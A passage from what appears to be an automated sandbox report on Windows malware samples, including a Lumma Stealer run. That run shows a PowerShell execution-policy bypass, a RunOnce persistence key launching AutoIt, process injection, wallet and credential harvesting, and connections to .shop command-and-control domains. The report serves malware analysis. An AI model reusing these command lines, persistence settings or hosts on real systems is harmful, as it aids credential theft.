| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2292 wrote to memory of 2192 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
153s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4900 wrote to memory of 3388 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 4900 wrote to memory of 3388 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 4900 wrote to memory of 3388 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\msncore.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2400 wrote to memory of 2532 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
141s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4848 wrote to memory of 968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4848 wrote to memory of 968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4848 wrote to memory of 968 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
134s
Max time network
119s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2308 set thread context of 492 | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | C:\Windows\SysWOW64\more.com |
Browser Information Discovery
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\9A2VOZ.pif | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Set-up.exe
"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1"
C:\Users\Admin\AppData\Roaming\9A2VOZ.pif
"C:\Users\Admin\AppData\Roaming\9A2VOZ.pif" "C:\Users\Admin\AppData\Roaming\N67EEG.xlsx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mindfuljournal.shop | udp |
| US | 104.21.79.92:443 | mindfuljournal.shop | tcp |
| US | 104.21.79.92:443 | mindfuljournal.shop | tcp |
| US | 104.21.79.92:443 | mindfuljournal.shop | tcp |
| US | 104.21.79.92:443 | mindfuljournal.shop | tcp |
| US | 104.21.79.92:443 | mindfuljournal.shop | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 172.67.185.54:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 104.21.84.104:443 | pixelpalette.shop | tcp |
Files
memory/2308-0-0x0000000074080000-0x00000000742C0000-memory.dmp
memory/2308-1-0x0000000076F40000-0x00000000770E9000-memory.dmp
memory/2308-8-0x0000000074093000-0x0000000074095000-memory.dmp
memory/2308-9-0x0000000074080000-0x00000000742C0000-memory.dmp
memory/2308-10-0x0000000074080000-0x00000000742C0000-memory.dmp
memory/492-13-0x0000000074080000-0x00000000742C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\c44e025e
| MD5 | 51ce6bb7811c2cb519df4248405e4724 |
| SHA1 | 237195ac7a01b2db385b09ebad099c77ee9780e7 |
| SHA256 | c07ff059a3774eb806e8c74eaba95e64ba4768cae00335a9eb9bd350ee220deb |
| SHA512 | c2cb5517d2e568db6adff52abfa6c99ef6993392cb54616765e5a0e90d57468a53c36e83af96baf030c6b4d6b9d3dde549e60ba73527f18161a6b203aa2b2347 |
memory/492-14-0x0000000076F40000-0x00000000770E9000-memory.dmp
memory/492-15-0x0000000074080000-0x00000000742C0000-memory.dmp
memory/492-16-0x0000000074080000-0x00000000742C0000-memory.dmp
memory/492-18-0x0000000074080000-0x00000000742C0000-memory.dmp
memory/2772-19-0x0000000076F40000-0x00000000770E9000-memory.dmp
memory/2772-20-0x0000000000080000-0x00000000000D9000-memory.dmp
memory/2772-23-0x00000000002BF000-0x00000000002C7000-memory.dmp
memory/2772-24-0x0000000000080000-0x00000000000D9000-memory.dmp
memory/2772-30-0x00000000006E0000-0x0000000000719000-memory.dmp
memory/2772-31-0x00000000006E0000-0x0000000000719000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
memory/2772-37-0x0000000000080000-0x00000000000D9000-memory.dmp
\Users\Admin\AppData\Roaming\9A2VOZ.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\N67EEG.xlsx
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20241010-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 2520 wrote to memory of 2524 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\msncore.dll
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
140s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3580 wrote to memory of 3216 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3580 wrote to memory of 3216 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3580 wrote to memory of 3216 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5052 wrote to memory of 2868 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5052 wrote to memory of 2868 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5052 wrote to memory of 2868 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 876 wrote to memory of 1712 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
137s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4144 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4144 wrote to memory of 4328 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win10v2004-20241007-en
Max time kernel
90s
Max time network
143s
Command Line
Signatures
